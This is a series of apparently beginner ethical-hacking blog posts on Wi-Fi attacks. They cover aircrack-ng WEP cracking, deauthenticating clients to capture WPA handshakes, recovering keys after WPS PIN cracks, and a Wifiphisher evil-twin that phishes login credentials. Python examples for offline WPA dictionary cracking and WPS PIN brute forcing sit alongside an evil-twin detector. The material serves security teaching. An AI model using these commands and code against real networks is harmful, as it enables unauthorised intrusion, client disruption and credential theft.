Posted on

Aircrack-ng: Complete guide for beginners

Hello, aspiring ethical hackers. In our previous blogpost, you learnt what Wi-Fi hacking is and the different techniques used to hack wireless networks. In most of these techniques, a tool named aircrack-ng plays a very important role.

In this blogpost, you will learn about this tool. Aircrack-ng is a complete suite of tools used to test Wi-Fi network security. The various functions of the suite include:

  1. Monitoring: capturing wireless packets and saving the data to files which can be processed by third-party tools.
  2. Attacking: performing various wireless attacks like replay attacks, deauthentication of clients from access points and fake access points, all through packet injection.
  3. Testing: checking Wi-Fi cards and driver capabilities (capture and injection).
  4. Cracking: recovering WEP and WPA-PSK (WPA and WPA2) keys.

Now that you know aircrack-ng is a collection of tools, let's see what those tools are and what each of them is used for.

1. airbase-ng:

It is a multi-purpose tool that attacks Wi-Fi clients rather than the access point, for example by acting as a fake access point.

2. airdecap-ng:

With this tool, you can decrypt WEP/WPA/WPA2 capture files once you have the key. It can also strip the 802.11 headers from an unencrypted wireless capture.

3. aircrack-ng:

It is the key cracking program: statistical attacks on collected WEP IVs and dictionary attacks on captured WPA/WPA2-PSK handshakes.

4. airdecloak-ng:

Some wireless intrusion prevention systems (WIPS) try to prevent WEP cracking by injecting fake WEP frames ("cloaking"). This tool removes the cloaked frames from a captured pcap file.

5. airdrop-ng:

airdrop-ng is a program used to deauthenticate users from access points. It uses rule-based deauthentication; rules can match on MAC address, type of hardware, etc.

6. aireplay-ng:

This tool is used to inject frames. It generates the traffic that aircrack-ng later uses for WEP and WPA-PSK key cracking, and it also sends deauthentication frames.

7. airmon-ng:

It is used to enable monitor mode on wireless interfaces.

8. airodump-ng:

This tool captures raw 802.11 frames. It is used particularly for collecting WEP IVs or WPA handshakes to crack later with aircrack-ng.

9. airolib-ng:

This tool stores and manages ESSID and password lists, calculates their Pairwise Master Keys (PMKs) and uses them in WPA/WPA2 cracking. Because the PMK is salted with the ESSID, a precomputed table only helps against networks with that exact name.

10. airtun-ng:

This tool creates a virtual tunnel interface. It has two basic functions: allowing encrypted traffic to be monitored for wireless intrusion detection system (WIDS) purposes, and injecting arbitrary traffic into a network.

11. besside-ng:

It is used to automatically crack WEP and WPA networks.

12. dcrack-ng:

dcrack distributes WPA2-PSK cracking across multiple servers.

13. easside-ng:

This "auto-magic" tool allows you to communicate with a WEP access point without knowing its WEP key.

14. packetforge-ng:

This tool creates encrypted packets to be used for injection. With it, we can create various types of packets like ARP requests, UDP, ICMP and custom packets.

15. tkiptun-ng:

This tool injects a few frames into a WPA-TKIP network.

16. wesside-ng:

Wesside-ng is another auto-magic tool that uses a variety of techniques to obtain the WEP key.

    Cracking WEP passwords with aircrack-ng

    Let's see how to crack WEP passwords with aircrack-ng. All Wi-Fi hacking attacks require a wireless adapter that supports packet injection. For this tutorial, I am using an ALFA wireless USB adapter. My attacker machine is Kali Linux installed on VMware. So I first connect the ALFA adapter to my laptop and make sure it is passed through to the Kali Linux virtual machine. Then I open a terminal in Kali Linux and type the command shown below, which lists all the wireless interfaces on the machine.

    iwconfig
    
    Wep Crack 1

    Then I start monitor mode on the wireless interface with airmon-ng. Monitor mode is the wireless equivalent of promiscuous mode on wired interfaces: the adapter captures all 802.11 frames in range, not just the ones addressed to it.

    Wep Crack 2

    I run "iwconfig" once again to confirm that monitor mode has been enabled on the wireless interface.

    Wep Crack 4

    As you can see, the name of the wireless interface changed from wlan0 to wlan0mon, so monitor mode is on. To see all the traffic observed by the interface, I run airodump-ng on it.

    how to crack wep with aircarck

    As you can see, this shows all the wireless networks around us. There are many, but my target is the access point I named "Hack_Me_If_You_Can". I run airodump-ng again, this time locked to the MAC address (BSSID) and channel of the target, writing all of its traffic to a file with the prefix wep_hc_crack.

    Wep Crack 7 1024x426

    In the above image, you can see the clients connected to the targeted access point. All the traffic belonging to "Hack_Me_If_You_Can" is saved in the file "wep_hc_crack.cap". What I am looking for are the initialization vectors (IVs): the 24-bit value sent in the clear with every WEP frame, which together with the secret key seeds RC4. Collecting enough of them is what cracks the key of any WEP-enabled access point.

    Remember: the more IVs we have, the better the chances of cracking the WEP key. Since I need more traffic to crack it quickly, I can use some tricks to generate it. aireplay-ng, another tool of the suite, has various methods of creating additional traffic. One such method is the ARP request replay attack.

    The classic ARP request replay attack is the most effective way to generate new IVs, and it works very reliably. aireplay-ng listens for an ARP packet and retransmits it to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over, and each copy repeated by the access point carries a new IV. It is all these new IVs which allow you to determine the WEP key. The attack can be started as shown below.

    Wep Crack 9

    where the "-h" option specifies the source MAC address to use (that of an associated client, so that the access point accepts the injected frames). Here is another way in which you can start the ARP replay attack.

    Wep Crack 15

    As IVs accumulate in the wep_hc_crack capture, I can use aircrack-ng to try cracking the key. The command is "aircrack-ng wep_hc_crack.cap".

    Wep Crack 10 1024x267

    If there are too few IVs (at this point I have only about 20), aircrack-ng waits for more. I keep the ARP request replay attack running until the traffic increases.

    Wep Crack 12 1024x276
    Wep Crack 14 1024x281

    You can see the traffic increasing. All I have to do now is play the waiting game.

    Wep Crack 18 1024x316
    Wep Crack 19 1024x306
    Wep Crack 20 1024x286
    Wep Crack 21 1024x297

    After collecting almost 25,000 IVs, aircrack-ng finally cracked the WEP key. The key of the access point is 1234567899: 10 hexadecimal digits, i.e. a 40-bit key, which together with the 24-bit IV is what vendors call 64-bit WEP. As you can see, it took me around one hour and thirty-five minutes to crack it.

    Cracking WPA / WPA2 passwords with aircrack-ng

    Now, let's see how to crack WPA/WPA2 with aircrack-ng. WPA stands for Wi-Fi Protected Access. It is a security protocol for WLANs designed to fix the known weaknesses of WEP (Wired Equivalent Privacy). WPA uses TKIP, which still runs RC4 underneath but with a 128-bit per-packet key and a 48-bit IV, whereas WEP used a 40- or 104-bit key with a 24-bit IV. WPA2 is the successor of WPA and mandates CCMP, which is built on AES. Both can authenticate with a pre-shared key (PSK) in personal mode, and many WPA2 access points still offer TKIP for compatibility with older clients. Until WPA3 arrived, WPA2 with CCMP was the strongest option available for Wi-Fi networks.

    I am using the same arrangement I used for cracking WEP above. So let's start. Once you have booted into Kali Linux, open a terminal and type the command "iwconfig". It lists your wireless interfaces just as ifconfig shows wired interfaces.

    Wpacrack1

    We can see that we have a wireless interface wlan0. Now we are going to start monitor mode on it. Monitor mode is the wireless equivalent of promiscuous mode in wired sniffing. Type the command shown below. We can see that monitor mode has been enabled on "mon0" (newer versions of airmon-ng name the interface wlan0mon instead).

    airmon-ng start wlan0
    
    Wpacrack2

    Now let's see all the traffic collected by our wireless interface. Type the command airodump-ng mon0.

    Wpacrack3

    Hit Enter. We can see all the wireless networks available as shown below.

    crack wpa

    We can see that all the Wi-Fi networks are configured with WPA2 or WPA. We are going to hack the network "shunya". We will collect shunya's network traffic into a file. Open a terminal and type the command "airodump-ng --bssid <MAC address of Wi-Fi access point> -c 13 --write wpacrack mon0".

    Wpacrack5

    where

    • --bssid is the basic service set identifier, i.e. the MAC address of the access point.
    • <MAC address> is the MAC address of the access point.
    • -c specifies the channel the Wi-Fi network is operating on.
    • --write writes the capture to a file.
    • "wpacrack" is the file-name prefix; airodump-ng appends a counter, so the capture is wpacrack-01.cap.
    • mon0 is the interface.

    Hit Enter. We will see the result as below.

    Wpacrack6

    We can only crack a WPA/WPA2-protected Wi-Fi network by capturing its four-way handshake, which is exchanged when a client associates (or re-associates) with the network. So let's disconnect all the clients connected to "shunya" first. Open a new terminal and type the command

    aireplay-ng --deauth 100 -a <MAC> --ignore-negative-one mon0
    

    where

    --deauth tells aireplay-ng to send deauthentication frames,

    100 is the number of deauthentication frames to send (0 means keep sending until stopped),

    -a specifies the access point,

    <MAC> is the MAC address of the wireless access point, and

    --ignore-negative-one works around the "fixed channel: -1" error that some drivers give.

    Wpacrack7

    This command sends 100 deauthentication frames to the broadcast address, spoofed from the access point's MAC, which disconnects all the clients of "shunya". As soon as this happens, the clients try to connect back to the network. In the airodump-ng terminal we can see that a WPA handshake has been captured (it appears in the top-right corner of the output).

    Wpacrack8

    Now let's see where our capture file is located. Type "ls". We will do dictionary password cracking here, so let's find out where the dictionaries are. Type the command "locate wordlists". This shows a number of wordlists available by default in Kali Linux.

    Wpacrack9

    Our captured traffic is stored in a .cap file. We will use the wordlist big.txt for cracking the password. Open a new terminal and type the command

    aircrack-ng wpacrack-01.cap -w /usr/share/dirb/wordlists/big.txt 
    
    Wpacrack10

    Hit Enter. If our wordlist contains the passphrase, the result will be as below. If it does not, we have to try another wordlist: aircrack-ng only verifies guesses against the handshake, it cannot recover a passphrase that is not in the list.

    Wpacrack11

    Remember that the choice of dictionary or wordlist plays a key role in WPA/WPA2 password cracking. So that is one way in which we crack WPA/WPA2 passwords with aircrack-ng. Hope this was helpful. Learn how to crack WPA/WPA2 with Fern WiFi Cracker.


    WPS pin is cracked but WPA key is not shown

    Hello aspiring ethical hackers. In this article, you will learn how to solve a problem you may experience while cracking a WPS PIN. We have seen how to retrieve the WPA key by cracking the WPS PIN with both Bully and Wifite. If you get the WPA key as soon as the WPS PIN is cracked, you are lucky. However, sometimes the WPS PIN is cracked but the WPA-PSK key is not shown. For example, see the image below.

    Wifi Wps 9

    In the above image, we can clearly see that Wifite cracked the WPS PIN successfully but failed to get the WPA key. To get the WPA key in such cases, first stop NetworkManager so that it does not compete with wpa_supplicant for the interface. Open a new terminal and type the command shown below.

    sudo systemctl stop NetworkManager

    Wifi Wps 10

    Then, using your favourite text editor, open the file wpa_supplicant.conf located in the /etc directory.

    Wifi Wps 12 1024x78

    You should see the contents of the file as shown below.

    Wifi Wps 11

    If there is any data beyond this, delete it and leave just the above three lines. Make sure update_config=1 is among them; without it wpa_supplicant will not write the credentials it obtains back into the file. Then, run the command shown below.

    sudo wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf

    Wifi Wps 13

    Leave this terminal open and open another new terminal window and run the command as shown below.

    sudo wpa_cli

    Wifi Wps 14

    It goes into interactive mode.

    Wifi Wps 15

    While interactive mode is active, type the following command as shown below.

    status

    Wifi Wps 16
    Wifi Wps 17

    Many events will scroll by, but what we are looking for is one that says "connected". Once that happens, check the wpa_supplicant.conf file and you should see the WPA-PSK key of the wireless network as shown below.

    wps pin

    Evil Twin Attack

    Hello aspiring ethical hackers. In this article, you will learn about the Evil Twin attack. Till now on our blog, readers have learnt about various wireless hacking tutorials like cracking WEP, cracking WPA/WPA2 and cracking WPS. Almost all of these methods involved brute forcing or password cracking. What if there were an easier way to hack wireless networks without the need for brute forcing?

    Well, the Evil Twin attack is one such attack. An evil twin attack is a wireless attack in which a fake Wi-Fi access point is set up with the same SSID as the original one. This fake access point appears legitimate but is actually set up to eavesdrop on the wireless communications of clients that would otherwise use the original. The evil twin is the wireless LAN equivalent of a phishing scam.

    Since it has the same name, it is called a twin, and since it is malicious it is an Evil Twin. The aim of this attack is to confuse users trying to connect to the target Wi-Fi network, make them connect to the Evil Twin instead, and thus capture sensitive data. Let's see it practically. There are many tools that can be used for this attack, but let's use a tool called Wifiphisher because it is the simplest. Our attacker system is Kali Linux. Wifiphisher can be installed on Kali Linux as shown below.

    Evil Twin 1

    Once installation is finished, Wifiphisher can be started using command.

    sudo wifiphisher

    Evil Twin 2

    Then the tool will prompt you to select the Wi-Fi access point of which you want to create an evil twin.

    Evil Twin 3

    For this tutorial as always (OK, most of the time) I will select the Wi-Fi network “Hack_Me_If_You_Can” as my target.

    Evil Twin 4

    The tool then lists the available phishing scenarios. In this case, the OAuth Login Page attack is available.

    Evil Twin 5

    The OAuth Login Page attack serves a fake login page asking the users who connect for their credentials. Note that the fake access point is created as an open network, unlike the protected one we are targeting; that mismatch (same SSID, a different BSSID, no encryption) is also the most visible sign of the attack from the defender's side. I select the OAuth Login Page attack and the attack starts.

    Evil Twin 6
    Evil Twin 7
    Evil Twin 8

    So imagine that while we are running this fake access point, some mobile user is looking for available Wi-Fi networks to connect to. He will see two networks with the same name and get confused. Once he selects our Evil Twin, he will be prompted with a login page as shown below.

    evil twin attack
    Evil Twin 11 512x1024

    Here, he is being asked to submit his Facebook credentials, with free internet as the carrot. The login page is believable even to me. If the user falls for the trick and submits his credentials as shown below,

    Evil Twin 12 512x1024

    on Kali Linux the activity is recorded as shown below,

    Evil Twin 9

    and the credentials are captured successfully.

    Evil Twin 13 1024x512

    That looked simple enough. But where can an Evil Twin attack be successful? In many places, but especially where there are free Wi-Fi access points: users expect an open network with that name, so an open evil twin with the same name raises no suspicion at all.
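A defender-side check for the attack described above, as an added example that is not part of the original post or of Wifiphisher: it walks a list of scanned access points, constructed here to mirror airodump-ng's AP table, and flags SSIDs that are advertised by an open access point while another access point with the same name is protected, or by a BSSID that is not in a known-good baseline. The scan rows, the baseline and the reason codes are all assumptions of this example.

```python
"""Evil-twin detection over a Wi-Fi scan.

Added example, not from the original post or from Wifiphisher. It encodes the
tell-tale the post describes: a second access point advertising the victim's
SSID, usually as an open network, from a different BSSID. The scan rows below
are constructed to mirror airodump-ng's AP table (BSSID, channel, privacy, ESSID);
the known-good baseline and the reason codes are assumptions of this example.
"""
from collections import defaultdict

SCAN = [  # constructed scan results
    ("AA:BB:CC:DD:EE:01", 1, "WPA2", "Hack_Me_If_You_Can"),
    ("AA:BB:CC:DD:EE:02", 6, "OPN", "Hack_Me_If_You_Can"),   # the evil twin
    ("10:20:30:40:50:60", 11, "WPA2", "shunya"),
    ("10:20:30:40:50:61", 11, "WPA2", "shunya"),             # same security, same vendor: second AP of one ESS
    ("DE:AD:BE:EF:00:01", 6, "OPN", "Airport_Free_WiFi"),
]
KNOWN_GOOD = {"Hack_Me_If_You_Can": {"AA:BB:CC:DD:EE:01"}}  # constructed site-survey baseline

WEAK = {"OPN", "WEP"}
REASON_UNKNOWN_BSSID = "bssid-not-in-baseline"
REASON_DOWNGRADED = "weaker-security-than-sibling-ap"
REASON_MIXED_VENDOR = "same-ssid-different-vendor-oui"


def oui(bssid: str) -> str:
    """First three octets of a MAC address: the vendor prefix."""
    return bssid.upper()[:8]


def find_evil_twins(scan, known_good=None):
    """Return (essid, bssid, reason) for access points that look like twins.

    Rules, strongest first: a BSSID not in the baseline for a surveyed SSID;
    an open/WEP AP sharing its SSID with a better-protected AP; and, as a weak
    hint only, one SSID served by APs from different vendors.
    """
    known_good = known_good or {}
    by_ssid = defaultdict(list)
    for bssid, channel, privacy, essid in scan:
        by_ssid[essid].append((bssid.upper(), channel, privacy))
    findings = []
    for essid, aps in by_ssid.items():
        privacies = {p for _, _, p in aps}
        vendors = {oui(b) for b, _, _ in aps}
        for bssid, channel, privacy in aps:
            if essid in known_good and bssid not in known_good[essid]:
                findings.append((essid, bssid, REASON_UNKNOWN_BSSID))
            elif len(privacies) > 1 and privacy in WEAK:
                findings.append((essid, bssid, REASON_DOWNGRADED))
            elif len(vendors) > 1:
                findings.append((essid, bssid, REASON_MIXED_VENDOR))
    return findings


if __name__ == "__main__":
    for essid, bssid, reason in find_evil_twins(SCAN, KNOWN_GOOD):
        print(f"{essid!r} from {bssid}: {reason}")
```

The baseline rule is the reliable one; the security-downgrade rule catches the exact setup Wifiphisher uses in the post (open twin of a protected network), and the vendor rule only raises a hint because a real ESS may legitimately mix hardware.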


    Understanding Wireless Security : Part 2

    Hello aspiring ethical hackers. Welcome to the second part of Understanding Wireless Security. In Part 1, readers learnt about the history of Wi-Fi, the terminology used in Wi-Fi, and WEP security and its weaknesses. So let's continue from there. Responding to the serious weaknesses of WEP, the Wi-Fi Alliance introduced Wi-Fi Protected Access (WPA) to secure wireless networks. However, the Wi-Fi Alliance intended WPA as an interim measure to take the place of WEP until it brought in Wi-Fi Protected Access 2 (WPA2).

    Wi – Fi Protected Access (WPA)

    WPA implements the Temporal Key Integrity Protocol (TKIP), a subset of the draft IEEE 802.11i standard, and was introduced in 2003. TKIP introduced three new mechanisms to overcome the weaknesses of Wired Equivalent Privacy (WEP):

    1. TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing the result to the RC4 cipher initialization. WEP, on the other hand, merely concatenated the initialization vector to the root key and passed that value to RC4, which is what lets an attacker recover the key from a large number of captured IVs.

    2. A sequence counter is implemented to protect against replay attacks. Packets received out of order are rejected by the access point.

    3. TKIP implements a 64-bit Message Integrity Check (MIC, called Michael) replacing the Cyclic Redundancy Check (CRC) used in WEP, and the sequence counter is re-initialised each time a new temporal key is installed.

    Wi – Fi Protected Access (WPA) 2

    WPA2 was introduced in 2004 to replace WPA. It implements the mandatory elements of IEEE 802.11i. 802.11i uses the Advanced Encryption Standard (AES) block cipher instead of the RC4 stream cipher used by both WEP and WPA, through the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). It provides the following security services.

    1. Data Confidentiality: It ensures only authorized parties can access the information

    2. Authentication: provides proof of genuineness of the user

    3. Access control in conjunction with layer management.

    Wi – Fi Protected Access 3 (WPA 3)

    The Wi-Fi Alliance announced WPA3 as a replacement to WPA2 in 2018. The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode (AES-256 in GCM mode with SHA-384 as HMAC) and still mandates the use of CCMP-128 (AES-128 in CCM mode) as the minimum encryption algorithm in WPA3-Personal mode.
    The WPA3 standard also replaces the pre-shared key (PSK) exchange with Simultaneous authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s. This results in a more secure initial key exchange in personal mode and forward secrecy.

    WPA – Versions

    There are two versions of WPA. They are,

    • A. WPA- Personal
    • B. WPA – Enterprise

    WPA – Personal

    Wi-Fi Protected Access (WPA) – Personal is designed for home and small office networks. This version uses Pre- Shared Key (PSK) and hence it is also referred as WPA-PSK (pre-shared key) mode. The network traffic is encrypted using a 128-bit encryption key derived from a 256-bit shared key. WPA-Personal mode is available on all three WPA versions.

    WPA – Enterprise

    As its name implies, this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup but provides additional security like protection against dictionary attacks on short passwords. Various kinds of the Extensible Authentication Protocol (EAP) are used for authentication. WPA-Enterprise mode is available on all three WPA versions.

    Weakness Of WPA/WPA2

    1. Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or passphrase, because the captured handshake lets an attacker test guesses offline.

    2. WPA passphrase hashes are salted with the SSID name and its length; rainbow tables exist for the top 1,000 network SSIDs and a multitude of common passwords, requiring only a quick lookup to speed up cracking WPA-PSK. A network with an unusual SSID is immune to those precomputed tables, though not to a direct dictionary attack.

    Brute forcing of simple passwords can be attempted using the Aircrack-ng suite, starting from the four-way authentication handshake exchanged during association or periodic re-authentication. In this article, readers have seen how a WPA password was cracked. One important feature of cracking WPA/WPA2 is that we don't need a lot of traffic to crack it. We just need one client connected to the Wi-Fi access point. Then we deauthenticate it from the access point. The client automatically tries to connect to the access point again.

    It is at this stage that we capture the WPA handshake. If you have noticed, while using aircrack-ng to crack the password we supplied a dictionary or wordlist, while for WEP we did not: WEP is broken by statistical analysis of the IVs, whereas the WPA handshake only lets us verify a guess.

    So what is a weak password? Any password that is part of a dictionary or wordlist can be called a weak password in WPA. Otherwise, WPA/WPA2 is considered secure. WPA3 replaces cryptographic protocols susceptible to offline analysis with protocols that require interaction with the infrastructure for each guessed password, placing limits on the number of guesses. However, design flaws found in WPA3 enable attackers to plausibly launch brute-force attacks.
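What the tutorial's final `aircrack-ng -w` step and the weakness described above boil down to, as an added example that is not aircrack-ng's own code: derive the PMK from the passphrase and the SSID (PBKDF2, 4096 rounds, which is why airolib-ng precomputes it per SSID), expand it to the PTK with the two MAC addresses and the two nonces, and compare the recomputed EAPOL MIC with the captured one. The MAC addresses, nonces, EAPOL-Key frame and wordlist are constructed in the script so that it runs offline; a real run would take those fields from the .cap file.

```python
"""Offline dictionary attack on a WPA/WPA2-PSK four-way handshake.

Added example, not aircrack-ng's code. Everything it needs (MAC addresses,
nonces, the EAPOL-Key frame, the wordlist) is constructed inline so it runs
offline; a real run would take these fields from the capture file.
"""
import hashlib
import hmac

AP_MAC = bytes.fromhex("001122334455")   # constructed BSSID
STA_MAC = bytes.fromhex("66778899aabb")  # constructed client MAC
ANONCE = bytes(range(32))                # constructed nonce from message 1
SNONCE = bytes(range(32, 64))            # constructed nonce from message 2
WORDLIST = ["password", "12345678", "letmein1", "shunya123", "qwertyui"]  # constructed


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so a table built for one SSID is useless for another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmk_table(ssid: str, wordlist) -> dict:
    """airolib-ng's trick: pay the 4096 rounds once per (SSID, word) and reuse."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, the two addresses and the two nonces (min/max ordering per the spec)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1
    truncated to 16 bytes for WPA2/CCMP, HMAC-MD5 for WPA/TKIP."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def message2_frame(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info (constructed): pairwise | MIC
            + b"\x00\x10"              # key length
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16             # MIC field, zeroed
            + b"\x00\x00")             # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def build_handshake(ssid: str, passphrase: str, wpa2: bool = True) -> dict:
    """Stand-in for the airodump-ng capture: the MIC a client with this passphrase sends."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = message2_frame(SNONCE)
    return {"ssid": ssid, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(kck, frame, wpa2), "wpa2": wpa2}


def crack_psk(hs: dict, wordlist, pmks: dict = None):
    """What `aircrack-ng -w wordlist capture.cap` does: per candidate, derive
    PMK -> PTK -> KCK and compare the recomputed MIC with the captured one."""
    pmks = pmks or {}
    for cand in wordlist:
        pmk = pmks.get(cand) or pmk_from_passphrase(cand, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["wpa2"]), hs["mic"]):
            return cand
    return None


if __name__ == "__main__":
    hs = build_handshake("shunya", "shunya123")
    print("recovered PSK:", crack_psk(hs, WORDLIST))
```

The per-guess cost is the PBKDF2 call; the PTK expansion and MIC are cheap. That is why a precomputed PMK table for the target SSID turns the attack into a lookup, and why the same table does nothing against a network with a different name.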

    Wi-Fi Protected Setup (WPS)

    In 2007, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS). The main purpose of this protocol is to allow home users who have little knowledge of wireless security to set up Wi-Fi Protected Access (for some users, accessing the router dashboard and setting passwords is too complex). It also makes it easy to add new devices to an existing wireless network without entering long passphrases, while still letting the network owner decide which devices are admitted. There are two common methods of using WPS.

    • PIN Method.
    • Push Button Method.

    PIN Method

    Every wireless router with WPS enabled has a PIN (usually printed on a sticker on the router). This PIN is entered on the new device that wants to connect, and the router then hands it the network credentials. No password needs to be memorised.

    Push Button Method

    In this method, the user pushes a WPS button on both the access point and the new wireless client device. On most devices, this discovery mode turns itself off as soon as a connection is established or after a delay (typically 2 minutes or less), whichever comes first, thereby minimising its exposure.
    Although WPS was introduced to simplify Wi-Fi connection, the PIN method suffers from a major vulnerability. Any attacker within radio range can recover the WPS PIN in a few hours by brute force. Once he does this, he can easily recover the WPA/WPA2 key as well. Many routers ship with WPS enabled by default. It is wise to turn off the WPS PIN feature, although this is not possible on many routers.
    WPS is widely understood to have added insecurity to otherwise secure WPA/WPA2. The WPS PIN is an 8-digit PIN, of which the last digit is a checksum of the first seven. Instead of checking the entire PIN at once, the router checks the first four digits first and then the last four, and its responses (a NACK after message M4 or after message M6) tell the attacker which half was wrong. This makes brute forcing WPS PINs very easy.
    The first half has only 10,000 possibilities, and once the attacker has it the second half has only 1,000 (three free digits plus the checksum), so the entire PIN falls in at most 11,000 guesses instead of 100 million.
    The tools Bully and Reaver are the first to come to mind when we want to crack a WPS PIN. However, in our latest tests, both tools presented some problems. You can read our previous articles on Bully and Wifite.
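The two-halves weakness above, as an added example that is not Reaver's or Bully's code: the checksum-digit rule from the WSC specification, and a brute force against a model registrar (written here as an assumption) that answers with the kind of NACK a vulnerable access point gives after M4 or M6. Running it shows the attempt count collapsing from 10^7 to at most 11,000.

```python
"""WPS PIN checksum and the split-verification brute force.

Added example, not Reaver's or Bully's code. The "registrar" is a model written
here that answers the way a vulnerable access point does: a NACK after M4 when
the first half of the PIN is wrong, a NACK after M6 when the second half is wrong.
"""


def wps_checksum(first_seven: int) -> int:
    """Eighth digit of a WPS PIN: the mod-10 weighted checksum from the WSC spec."""
    acc = 0
    while first_seven:
        acc += 3 * (first_seven % 10)
        first_seven //= 10
        acc += first_seven % 10
        first_seven //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the checksum of the first 7."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def make_registrar(secret_pin: str):
    """Model of a WPS registrar that leaks which half of the PIN failed."""
    assert is_valid_pin(secret_pin)

    def check(pin: str) -> str:
        if pin[:4] != secret_pin[:4]:
            return "nack-after-m4"      # first half wrong
        if pin[4:] != secret_pin[4:]:
            return "nack-after-m6"      # second half wrong
        return "ok"
    return check


def brute_force_pin(check):
    """Recover the PIN in at most 10**4 + 10**3 = 11,000 attempts instead of 10**7.

    The first loop only cares whether the reply is a NACK after M4, so any
    filler works for the second half; the second loop enumerates the three free
    digits and computes the checksum instead of guessing it.
    """
    attempts = 0
    first_half = None
    for i in range(10_000):
        attempts += 1
        if check(f"{i:04d}0000") != "nack-after-m4":
            first_half = f"{i:04d}"
            break
    for j in range(1_000):
        attempts += 1
        seven = first_half + f"{j:03d}"
        pin = seven + str(wps_checksum(int(seven)))
        if check(pin) == "ok":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    pin, tries = brute_force_pin(make_registrar("12345670"))
    print(f"recovered {pin} in {tries} attempts (worst case 11000, naive 10**7)")
```

The model ignores lockouts and timing; real access points that implement AP lockout after a few failed attempts stretch the attack from hours to days, which is exactly the mitigation to look for when the PIN method cannot be disabled.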

    That was a complete guide to understanding wireless security. Hope our readers now have a better understanding of Wireless security. You can read Part 1 of Understanding Wireless security here. Happy hacking.


    WiFi hacking: complete guide for beginners

    Hello aspiring ethical hackers. In this blogpost, we bring you the complete guide to Wi-Fi hacking. Wi-Fi hacking or wireless hacking is the compromising of wireless networks. Before going deep into hacking wireless networks, let us give you a brief history of Wi-Fi.

    History of Wi-Fi

    Wi-Fi is the name given to a family of wireless network protocols, based on the IEEE 802.11 family of standards. These are commonly used for local area networking of devices and also for Internet access. Simply put, this allows nearby digital devices to exchange data using radio waves. No need to mention what these devices are.

    The beginning of Wi – Fi happened in the form of ALOHAnet which successfully connected the Great Hawaiian Islands with a UHF wireless packet network in 1971. ALOHA net and the ALOHA protocol in fact were precursors of Ethernet and 802.11 protocols.

    After another 14 years, in 1985, a ruling by the U.S. Federal Communications Commission released several bands for unlicensed use. Among them are the 2.4 gigahertz (120 mm) UHF and 5 gigahertz (60 mm) SHF radio bands, the same bands used by equipment such as microwave ovens and cordless phones, which is why Wi-Fi has to cope with interference.

    The first version of the 802.11 protocol was released in 1997 and provided speeds up to 2 Mbit/s. 802.11a, ratified in 1999, came as an improvement over the original standard: it operates in the 5 GHz band, uses 52-subcarrier orthogonal frequency-division multiplexing (OFDM) and reaches 54 Mbit/s. 802.11b, ratified the same year, stayed in the 2.4 GHz band at 11 Mbit/s, and it is this protocol that would eventually make Wi-Fi popular.

    In the same year, a non-profit association named Wi-Fi Alliance was formed which restricted the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing. By 2017, the Wi-Fi Alliance had more than 800 companies from around the world and shipped over 3.05 billion Wi-Fi enabled devices by year 2019.
    Apple was among the first to ship Wi-Fi connectivity in consumer laptops. 802.11g was added to the 802.11 specification in 2003. It operates in the 2.4 GHz microwave band and provides speeds up to 54 Mbit/s. Another standard, 802.11n, was ratified in 2009; it operates in both 2.4 and 5 GHz and has link rates of 72 to 600 Mbit/s. This standard is also known as Wi-Fi 4.

    Similarly, 802.11ac (Wi-Fi 5) and 802.11ax (Wi-Fi 6) were adopted later and further improved the speed and performance of Wi-Fi. Now, let us learn some terms that frequently occur regarding wireless.

    Basic terminology Of Wi-Fi hacking

    Wireless Access Point (WAP): A Wireless Access Point (WAP), commonly known as Access Point (AP) is a networking hardware device that allows other Wi-Fi devices to connect to it. This Access Point allows wireless devices to connect to wired devices and generally provides internet. Mostly the Access Point is a Wi -Fi Router.

